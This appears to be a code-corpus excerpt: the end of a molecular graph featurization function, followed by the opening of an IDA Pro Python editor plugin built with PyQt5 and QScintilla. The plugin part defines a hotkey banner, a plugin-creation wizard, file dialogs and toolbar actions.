          np.array([[1] * n_atoms + [0] * (max_atoms - n_atoms)] * n_atoms +
                   [[0] * max_atoms] * (max_atoms - n_atoms), dtype=float))
membership.extend([im] * n_atoms)
atom_feat = np.stack(atom_feat)
pair_feat = np.stack(pair_feat)
atom_mask = np.stack(atom_mask)
pair_mask = np.stack(pair_mask)
membership = np.array(membership)
# Generate dicts
dict_DTNN = {
self.atom_features_placeholder: atom_feat,
self.pair_features_placeholder: pair_feat,
self.atom_mask_placeholder: atom_mask,
self.pair_mask_placeholder: pair_mask,
self.membership_placeholder: membership
}
return dict_DTNN
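# Editor's note: hedged usage sketch; the names below are illustrative and not
# from the original source. Assuming `mols` is a list of WeaveMol objects with
# at most `max_atoms` atoms each:
#
#   topology = WeaveGraphTopology(max_atoms=50, n_atom_feat=75, n_pair_feat=14)
#   feed_dict = topology.batch_to_feed_dict(mols)
#   sess.run(outputs, feed_dict=feed_dict)  # merge with label feeds as needed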
| mit | -5,590,897,651,264,117,000 | 31.773279 | 101 | 0.635207 | false |
techbliss/Python_editor | 7.0/plugins/Code editor/pyeditor.py | 1 | 41135 | # Created by Storm Shadow www.techbliss.org
# Created by Storm Shadow www.techbliss.org
print "\n" #getting the box fit
print " ###################################################\n" \
" # Author Storm Shadow # \n" \
" # Hotkeys # \n" \
" # NewFile: Ctrl+N #\n" \
" # OpenFile: Ctrl+O #\n" \
" # SaveFile: Ctrl+S #\n" \
" # RunScript: Ctrl+E #\n" \
" # Undo: Ctrl+Z #\n" \
" # Redo: Ctrl+Y #\n" \
" # SelectALL: Ctrl+A #\n" \
" # Paste: Ctrl+V #\n" \
" # Font: Ctrl+F #\n" \
" # ResetFolding: Ctrl+R #\n" \
" # CircleFolding: Ctrl+C #\n" \
" # PlainFolding: Ctrl+P #\n" \
" # HEX-ray Home: Ctrl+W #\n" \
" # Ida Pro Python SDK Ctrl+I #\n" \
" # IDAPROPythonGit: Ctrl+G #\n" \
" # Author: Ctrl+B #\n" \
" # Enable Reg: Alt+E #\n" \
" # Disable Reg: Alt+D #\n" \
" # Zoom in Ctrl+Shift+ + #\n" \
" # Zoom Out Ctrl+Shift+ - #\n" \
" # Profile Code Ctrl+Shift+ E #\n" \
" ###################################################\n" \
" # IDA PRO python Editor #\n" \
" ###################################################\n"
import os
import sys
try:
dn = idaapi.idadir("plugins\\Code editor")
except NameError:
dn = os.getcwd()
try:
TemplateFile = idaapi.idadir("plugins\\Code editor\\template\\Plugin_temp")
except NameError:
TemplateFile = os.getcwd()+r'\\template\\Plugin_temp'
sys.path.insert(0, dn)
sys.path.insert(0, os.getcwd()+r'\\icons')
sys.path.insert(0, os.getcwd()+r'\\template')
import PyQt5
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.Qsci import QsciScintilla, QsciLexerPython
from PyQt5.QtGui import QFont, QFontMetrics, QColor
from PyQt5.QtWidgets import QDialog, QMessageBox, QWizard, QWizardPage
from PyQt5.QtCore import QCoreApplication
plugin_path = ""
if sys.platform == "win32":
if hasattr(sys, "frozen"):
plugin_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), "PyQt5", "plugins")
QCoreApplication.addLibraryPath(plugin_path)
else:
import site
for dir in site.getsitepackages():
QCoreApplication.addLibraryPath(os.path.join(dir, "PyQt5", "plugins"))
elif sys.platform == "darwin":
plugin_path = os.path.join(QCoreApplication.getInstallPrefix(), "Resources", "plugins")
if plugin_path:
QCoreApplication.addLibraryPath(plugin_path)
if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):
PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)
if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):
PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)
try:
import ico
except ImportError:
import icons.ico
try:
import iconsmore
except ImportError:
import icons.iconsmore
try:
import icons3
except ImportError:
import icons.icons3
try:
import iconf
except ImportError:
import icons.iconf
try:
import icon4
except ImportError:
pass
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtWidgets.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text,
disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig)
class Ui_messageformForm(QtWidgets.QWidget):
def setupUi1(self, messageformForm):
messageformForm.setObjectName("messageformForm")
messageformForm.resize(404, 169)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(messageformForm.sizePolicy().hasHeightForWidth())
messageformForm.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
messageformForm.setFont(font)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/icons/twa.gif"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
messageformForm.setWindowIcon(icon2)
self.label = QtWidgets.QLabel(messageformForm)
self.label.setGeometry(QtCore.QRect(40, 20, 341, 111))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.retranslateUi(messageformForm)
QtCore.QMetaObject.connectSlotsByName(messageformForm)
def retranslateUi(self, messageformForm):
_translate = QtCore.QCoreApplication.translate
messageformForm.setWindowTitle(_translate("messageformForm", "Soon to be fixed"))
self.label.setText(_translate("messageformForm", "Soon to be fixed"
))
class Ui_Wizard(QtWidgets.QWizard):
def __init__(self, parent=None):
super(Ui_Wizard, self).__init__(parent=None)
Wizard.setObjectName("Wizard")
Wizard.resize(762, 500)
font = QtGui.QFont()
font.setFamily("Calibri Light")
Wizard.setFont(font)
Wizard.setOptions(QtWidgets.QWizard.HelpButtonOnRight)
self.wizardPage1 = QtWidgets.QWizardPage()
font = QtGui.QFont()
font.setFamily("Calibri Light")
font.setPointSize(20)
self.wizardPage1.setFont(font)
self.wizardPage1.setObjectName("wizardPage1")
self.textBrowser_2 = QtWidgets.QTextBrowser(self.wizardPage1)
self.textBrowser_2.setGeometry(QtCore.QRect(130, 140, 421, 131))
self.textBrowser_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_2.setObjectName("textBrowser_2")
Wizard.addPage(self.wizardPage1)
self.wizardPage = QtWidgets.QWizardPage()
self.wizardPage.setTitle("")
self.wizardPage.setSubTitle("")
self.wizardPage.setObjectName("wizardPage")
self.textBrowser_4 = QtWidgets.QTextBrowser(self.wizardPage)
self.textBrowser_4.setGeometry(QtCore.QRect(130, 140, 499, 239))
self.textBrowser_4.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_4.setObjectName("textBrowser_4")
Wizard.addPage(self.wizardPage)
self.tempwizardPage = QtWidgets.QWizardPage()
self.tempwizardPage.setObjectName("tempwizardPage")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tempwizardPage)
self.verticalLayout.setObjectName("verticalLayout")
self.TemptextEdit = Qsci.QsciScintilla(self.tempwizardPage)
self.TemptextEdit.setToolTip("")
self.TemptextEdit.setWhatsThis("")
self.TemptextEdit.setObjectName("TemptextEdit")
self.verticalLayout.addWidget(self.TemptextEdit)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.temppushButtonopen = QtWidgets.QPushButton(self.tempwizardPage)
self.temppushButtonopen.setObjectName("temppushButtonopen")
self.horizontalLayout.addWidget(self.temppushButtonopen)
self.temppushButtonsave = QtWidgets.QPushButton(self.tempwizardPage)
self.temppushButtonsave.setObjectName("temppushButtonsave")
self.horizontalLayout.addWidget(self.temppushButtonsave)
self.verticalLayout.addLayout(self.horizontalLayout)
Wizard.addPage(self.tempwizardPage)
self.scriptwizardPage = QtWidgets.QWizardPage()
self.scriptwizardPage.setObjectName("scriptwizardPage")
self.textBrowser_5 = QtWidgets.QTextBrowser(self.scriptwizardPage)
self.textBrowser_5.setGeometry(QtCore.QRect(120, 130, 499, 239))
self.textBrowser_5.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_5.setObjectName("textBrowser_5")
Wizard.addPage(self.scriptwizardPage)
self.wizardPage_3 = QtWidgets.QWizardPage()
self.wizardPage_3.setObjectName("wizardPage_3")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.wizardPage_3)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.script_textEdit = Qsci.QsciScintilla(self.wizardPage_3)
self.script_textEdit.setToolTip("")
self.script_textEdit.setWhatsThis("")
self.script_textEdit.setObjectName("script_textEdit")
self.verticalLayout_2.addWidget(self.script_textEdit)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.scriptGrabpushButton = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptGrabpushButton.setObjectName("scriptGrabpushButton")
self.horizontalLayout_2.addWidget(self.scriptGrabpushButton)
self.scriptpushButtonopen = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptpushButtonopen.setObjectName("scriptpushButtonopen")
self.horizontalLayout_2.addWidget(self.scriptpushButtonopen)
self.scriptpushButtonsave = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptpushButtonsave.setObjectName("scriptpushButtonsave")
self.horizontalLayout_2.addWidget(self.scriptpushButtonsave)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
Wizard.addPage(self.wizardPage_3)
self.wizardPage_2 = QtWidgets.QWizardPage()
font = QtGui.QFont()
font.setPointSize(20)
self.wizardPage_2.setFont(font)
self.wizardPage_2.setObjectName("wizardPage_2")
self.textBrowser_6 = QtWidgets.QTextBrowser(self.wizardPage_2)
self.textBrowser_6.setGeometry(QtCore.QRect(170, 140, 411, 191))
self.textBrowser_6.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_6.setObjectName("textBrowser_6")
Wizard.addPage(self.wizardPage_2)
#font textedit
self.skrift = QFont()
self.skrift.setFamily('Consolas')
self.skrift.setFixedPitch(True)
self.skrift.setPointSize(11)
self.TemptextEdit.setFont(self.skrift)
self.script_textEdit.setFont(self.skrift)
#python style temp
self.lexer = QsciLexerPython(self.TemptextEdit)
self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
        #Python style scripts
self.lexer = QsciLexerPython(self.script_textEdit)
self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
self.filename = ""
#python style temp
self.TemptextEdit.setAutoCompletionThreshold(0)
self.TemptextEdit.setAutoCompletionThreshold(6)
self.TemptextEdit.setAutoCompletionThreshold(8)
self.TemptextEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
# self.TemptextEdit.setDefaultFont(self.skrift)
self.TemptextEdit.setLexer(self.lexer)
self.TemptextEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#python style script
self.script_textEdit.setAutoCompletionThreshold(0)
self.script_textEdit.setAutoCompletionThreshold(6)
self.script_textEdit.setAutoCompletionThreshold(8)
self.script_textEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
# self.script_textEdit.setDefaultFont(self.skrift)
self.script_textEdit.setLexer(self.lexer)
self.script_textEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#line numbers temp
fontmetrics = QFontMetrics(self.skrift)
self.TemptextEdit.setMarginsFont(self.skrift)
self.TemptextEdit.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.TemptextEdit.setTabWidth(4)
#line numbers script
fontmetrics = QFontMetrics(self.skrift)
self.script_textEdit.setMarginsFont(self.skrift)
self.script_textEdit.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.script_textEdit.setTabWidth(4)
#brace temp
self.TemptextEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#brace script
self.script_textEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#auto line tab =4 temp
self.TemptextEdit.setAutoIndent(True)
#auto line tab =4 script
self.TemptextEdit.setAutoIndent(True)
#scroolbar
self.script_textEdit.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1)
try:
bs = open(TemplateFile).read()
bba = QtCore.QByteArray(bs)
self.bts = QtCore.QTextStream(bba)
self.bheysa = self.bts.readAll()
self.TemptextEdit.setText(self.bheysa)
self.TemptextEdit.setMarkerBackgroundColor((QColor(66, 66, 255)))
marker = self.TemptextEdit.markerDefine(PyQt5.Qsci.QsciScintilla.Rectangle, 2)
self.TemptextEdit.markerAdd(7, 2)
self.TemptextEdit.markerAdd(11, 2)
self.TemptextEdit.markerAdd(12, 2)
self.TemptextEdit.markerAdd(13, 2)
self.TemptextEdit.markerAdd(14, 2)
self.TemptextEdit.markerAdd(15, 2)
self.TemptextEdit.markerAdd(19, 2)
self.TemptextEdit.markerAdd(27, 2)
self.TemptextEdit.markerAdd(34, 2)
self.TemptextEdit.markerAdd(35, 2)
self.TemptextEdit.markerAdd(40, 2)
self.TemptextEdit.markerAdd(41, 2)
self.TemptextEdit.markerAdd(42, 2)
self.TemptextEdit.markerAdd(43, 2)
self.TemptextEdit.markerAdd(44, 2)
self.TemptextEdit.markerAdd(45, 2)
self.TemptextEdit.markerAdd(48, 2)
self.TemptextEdit.markerAdd(50, 2)
self.TemptextEdit.markerAdd(51, 2)
self.TemptextEdit.markerAdd(52, 2)
self.TemptextEdit.markerAdd(53, 2)
self.TemptextEdit.markerAdd(54, 2)
self.TemptextEdit.markerAdd(55, 2)
self.TemptextEdit.markerAdd(62, 2)
self.TemptextEdit.markerAdd(63, 2)
self.TemptextEdit.markerAdd(64, 2)
self.TemptextEdit.markerAdd(67, 2)
self.TemptextEdit.markerAdd(89, 2)
self.TemptextEdit.markerAdd(97, 2)
self.TemptextEdit.markerAdd(98, 2)
self.TemptextEdit.markerAdd(99, 2)
self.TemptextEdit.markerAdd(102, 2)
except:
self.TemptextEdit.setText('Plugin_temp file not found')
pass
self.retranslateUi2(Wizard)
QtCore.QMetaObject.connectSlotsByName(Wizard)
def retranslateUi2(self, Wizard):
_translate = QtCore.QCoreApplication.translate
Wizard.setWindowTitle(_translate("Wizard", " Ida Pro Plugin Wizard"))
self.textBrowser_2.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Welcome to the plugin wizard.</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Please follow the steps in the wizard, to tranform your code, to a full Ida Pro plugin.</p></body></html>"))
self.textBrowser_4.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">First we create the plugin loader</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Then we change the higlightet text in the template, and then save the plugin loader in Ida Pro Plugins folder.</span></p></body></html>"))
self.temppushButtonopen.setText(_translate("Wizard", "Open"))
self.temppushButtonsave.setText(_translate("Wizard", "Save"))
self.textBrowser_5.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Now we grab the editors current script, or open a new script.<br />Remember to save this in the right folder.<br />Plugins\\My_plugin_folder as declared in the template.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:20pt;\"><br /></p></body></html>"))
self.scriptGrabpushButton.setText(_translate("Wizard", "Grab from Editor"))
self.scriptpushButtonopen.setText(_translate("Wizard", "Open"))
self.scriptpushButtonsave.setText(_translate("Wizard", "Save"))
self.textBrowser_6.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Loader Template should now be in <br />ida pro\\plugin<br />script should be in a subfolder<br />ida pro\\plugin\\Myplugin\\</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If above are correct your good to go!</p></body></html>"))
self.temppushButtonopen.clicked.connect(self.opentemp)
self.temppushButtonsave.clicked.connect(self.savetemp)
self.scriptpushButtonopen.clicked.connect(self.openscript)
self.scriptpushButtonsave.clicked.connect(self.savescript)
self.scriptGrabpushButton.clicked.connect(self.grapper)
def grapper(self):
#hellotext = Ui_MainWindow
# hello2= hellotext.sendgrapped
# print str(hello2)
messageformForm.show()
def opentemp(self):
self.path = QtCore.QFileInfo(self.filename).path()
        # Get filename and show only Python files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.TemptextEdit.setText(self.file.read())
os.chdir(str(self.path))
def savetemp(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetexttemp(self.filename)
os.chdir(str(self.path))
def savetexttemp(self, fileName):
textout = self.TemptextEdit.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.tempwizardPage,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
def openscript(self):
self.path = QtCore.QFileInfo(self.filename).path()
        # Get filename and show only Python files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.script_textEdit.setText(self.file.read())
os.chdir(str(self.path))
def savescript(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self.wizardPage_3, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetextscript(self.filename)
os.chdir(str(self.path))
def savetextscript(self, fileName):
textout = self.script_textEdit.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.wizardPage_3,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
from PyQt5 import Qsci
import sys
#app2 = QtWidgets.QApplication(sys.argv)
class Ui_MainWindow(QtWidgets.QMainWindow):
ARROW_MARKER_NUM = 8
def __init__(self, parent=None):
super(Ui_MainWindow, self).__init__(parent=None)
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(640, 480)
self.vindu = QtWidgets.QWidget(MainWindow)
self.vindu.setStyleSheet(_fromUtf8('notusedasyet'))
#MainWindow.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.vindu.setObjectName(_fromUtf8("vindu"))
self.verticalLayout = PyQt5.QtWidgets.QVBoxLayout(self.vindu)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/ico/python.png")), QtGui.QIcon.Normal, QtGui.QIcon.On)
MainWindow.setWindowIcon(icon)
self.verticalLayout.setContentsMargins(0,0,0,0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName(_fromUtf8('verticalLayout'))
self.codebox = Qsci.QsciScintilla(self.vindu)
self.codebox.setToolTip(_fromUtf8(""))
self.codebox.setWhatsThis(_fromUtf8(""))
self.codebox.setAutoFillBackground(False)
self.codebox.setFrameShape(QtWidgets.QFrame.NoFrame)
self.codebox.setObjectName(_fromUtf8("codebox"))
self.verticalLayout.addWidget(self.codebox)
MainWindow.setCentralWidget(self.vindu)
#toolbar
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setAutoFillBackground(False)
self.toolBar.setIconSize(QtCore.QSize(32, 32))
self.toolBar.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.toolBar.setObjectName(_fromUtf8("toolBar2"))
MainWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar)
self.toolBar.addSeparator()
#toolbar2 debugger
#self.toolBar2 = QtGui.QToolBar(MainWindow)
#self.toolBar2.setAutoFillBackground(False)
#self.toolBar2.setIconSize(QtCore.QSize(32, 32))
#self.toolBar2.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
#self.toolBar2.setObjectName(_fromUtf8("toolBar"))
# MainWindow.addToolBar(QtCore.Qt.RightToolBarArea, self.toolBar2)
# self.toolBar2.addSeparator()
#getting ready for debugger
self.codebox.setMarginSensitivity(1, True)
self.codebox.marginClicked.connect(self.on_margin_clicked)
self.codebox.markerDefine(QsciScintilla.FullRectangle, self.ARROW_MARKER_NUM)
self.codebox.setMarkerBackgroundColor(QColor("#ee1111"), self.ARROW_MARKER_NUM)
#first action Newfile
self.toolBar.newAction = QtWidgets.QAction(QtGui.QIcon(":/ico/new.png"),"New",self.toolBar)
self.toolBar.newAction.setStatusTip("Clear TextBox or make new document.")
self.toolBar.newAction.setShortcut("Ctrl+N")
self.toolBar.newAction.triggered.connect(self.newfile)
#second Action OpenFile
self.toolBar.secondAction = QtWidgets.QAction(QtGui.QIcon(":/ico/open.png"),"Open",self.toolBar)
        self.toolBar.secondAction.setStatusTip("Open an existing document.")
self.toolBar.secondAction.setShortcut("Ctrl+O")
self.toolBar.secondAction.triggered.connect(self.open)
# action 3 save file
self.toolBar.Action3 = QtWidgets.QAction(QtGui.QIcon(":/ico/save.png"),"Save",self.toolBar)
self.toolBar.Action3.setStatusTip("Save Your File.")
self.toolBar.Action3.setShortcut("Ctrl+S")
self.toolBar.Action3.triggered.connect(self.savefile)
#action 4 run file
self.toolBar.Action4 = QtWidgets.QAction(QtGui.QIcon(":/ico/run32.png"),"Run",self.toolBar)
self.toolBar.Action4.setStatusTip("Run")
self.toolBar.Action4.setShortcut("Ctrl+E")
self.toolBar.Action4.triggered.connect(self.runto)
#action 21 debug
#self.toolBar2.Action21 = QtGui.QAction(QtGui.QIcon(":/ico/run32.png"),"Debug",self.toolBar)
#self.toolBar2.Action21.setStatusTip("Debug File.")
#self.toolBar2.Action21.setShortcut("Ctrl+7")
#self.toolBar2.Action21.triggered.connect(self.debugto)
#action 6 undo
        self.toolBar.Action6 = QtWidgets.QAction(QtGui.QIcon(":/ico/undo.png"),"Undo",self.toolBar)
self.toolBar.Action6.setStatusTip("Undo.")
self.toolBar.Action6.setShortcut("Ctrl+Z")
self.toolBar.Action6.triggered.connect(self.codebox.undo)
#action 7 redo
self.toolBar.Action7 = QtWidgets.QAction(QtGui.QIcon(":/ico/redo.png"),"Redo",self.toolBar)
self.toolBar.Action7.setStatusTip("Redo.")
self.toolBar.Action7.setShortcut("Ctrl+Y")
self.toolBar.Action7.triggered.connect(self.codebox.redo)
#action8 rerset Folding
self.toolBar.Action8 = QtWidgets.QAction(QtGui.QIcon(":/ico/align-justify.png"),"Reset Folding",self.toolBar)
self.toolBar.Action8.setStatusTip("Reset Folding.")
self.toolBar.Action8.setShortcut("Ctrl+R")
self.toolBar.Action8.triggered.connect(self.nofoldingl)
#actions9 CircledTreeFoldStyle
self.toolBar.Action9 = QtWidgets.QAction(QtGui.QIcon(":/ico/bullet.png"),"Circled Tree Folding",self.toolBar)
self.toolBar.Action9.setStatusTip("Circled Tree Folding.")
self.toolBar.Action9.setShortcut("Ctrl+C")
self.toolBar.Action9.triggered.connect(self.Circledfold)
#actions10 plainFoldStyle
self.toolBar.Action10 = QtWidgets.QAction(QtGui.QIcon(":/ico/number.png"),"Plain Folding",self.toolBar)
self.toolBar.Action10.setStatusTip("Plain Folding")
self.toolBar.Action10.setShortcut("Ctrl+P")
self.toolBar.Action10.triggered.connect(self.plainfold)
# fonts
self.toolBar.Action21 = QtWidgets.QAction(QtGui.QIcon(":/ico4/font.png"), "Fonts", self.toolBar)
self.toolBar.Action21.setStatusTip("Fonts")
self.toolBar.Action21.setShortcut("Ctrl+F")
self.toolBar.Action21.triggered.connect(self.font_choice)
#web baby
self.toolBar.Action11 = QtWidgets.QAction(QtGui.QIcon(":/ico/web.png"),"Hex-rays Homepage",self.toolBar)
self.toolBar.Action11.setStatusTip("Home of Hex-rays")
self.toolBar.Action11.setShortcut("Ctrl+W")
self.toolBar.Action11.triggered.connect(self.webopen)
#irc
self.toolBar.Action12 = QtWidgets.QAction(QtGui.QIcon(":/ico3/settings.png"),"Open Ida Pro Python SDK",self.toolBar)
self.toolBar.Action12.setStatusTip("Ida Pro Python SDK")
self.toolBar.Action12.setShortcut("Ctrl+I")
self.toolBar.Action12.triggered.connect(self.sdkopen)
#github Python
self.toolBar.Action14 = QtWidgets.QAction(QtGui.QIcon(":/ico/github.png"),"Open git python",self.toolBar)
self.toolBar.Action14.setStatusTip("Open git python")
self.toolBar.Action14.setShortcut("Ctrl+G")
self.toolBar.Action14.triggered.connect(self.gitopen)
        #author me :)
self.toolBar.Action15 = QtWidgets.QAction(QtGui.QIcon(":/ico/auth.png"),"Author",self.toolBar)
self.toolBar.Action15.setStatusTip("Author")
self.toolBar.Action15.setShortcut("Ctrl+B")
self.toolBar.Action15.triggered.connect(self.Author)
        #toggle off code recognition
self.toolBar.Action16 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pythonminus.png"),"Disable Code recognition",self.toolBar)
self.toolBar.Action16.setStatusTip("Disable Code recognition")
self.toolBar.Action16.setShortcut("Alt+D")
        self.toolBar.Action16.triggered.connect(self.DisableCode)
        #toggle on
self.toolBar.Action17 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pypluss.png"),"Enable Code recognition",self.toolBar)
self.toolBar.Action17.setStatusTip("Enable Code recognition")
self.toolBar.Action17.setShortcut("Alt+E")
        self.toolBar.Action17.triggered.connect(self.EnableCode)
# zoom in
self.toolBar.Action18 = QtWidgets.QAction(QtGui.QIcon(":/ico3/in.png"),"Zoom In",self.toolBar)
self.toolBar.Action18.setStatusTip("Zoom In")
self.toolBar.Action18.setShortcut("CTRL+SHIFT++")
self.toolBar.Action18.triggered.connect(self.udder)
#zoom out
self.toolBar.Action19 = QtWidgets.QAction(QtGui.QIcon(":/ico3/out.png"),"Zoom Out",self.toolBar)
self.toolBar.Action19.setStatusTip("Zoom Out")
self.toolBar.Action19.setShortcut("CTRL+SHIFT+-")
self.toolBar.Action19.triggered.connect(self.odder)
self.toolBar.Action20 = QtWidgets.QAction(QtGui.QIcon(":/ico3/10.png"),"Profile Code",self.toolBar)
self.toolBar.Action20.setStatusTip("Profile Code")
self.toolBar.Action20.setShortcut("CTRL+SHIFT+E")
self.toolBar.Action20.triggered.connect(self.runtoprob)
#PLUGINS HERE WE GO
self.toolBar.Action22 = QtWidgets.QAction(QtGui.QIcon(":/ico5/plugin.png"),"Plugin",self.toolBar)
self.toolBar.Action22.setStatusTip("Make plugin")
self.toolBar.Action22.setShortcut("")
self.toolBar.Action22.triggered.connect(self.plugin_make)
self.scriptfile = self.codebox.text()
self.filename = ""
#actions
self.toolBar.addAction(self.toolBar.newAction)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.secondAction)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action3)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action4)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action6)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action7)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action8)
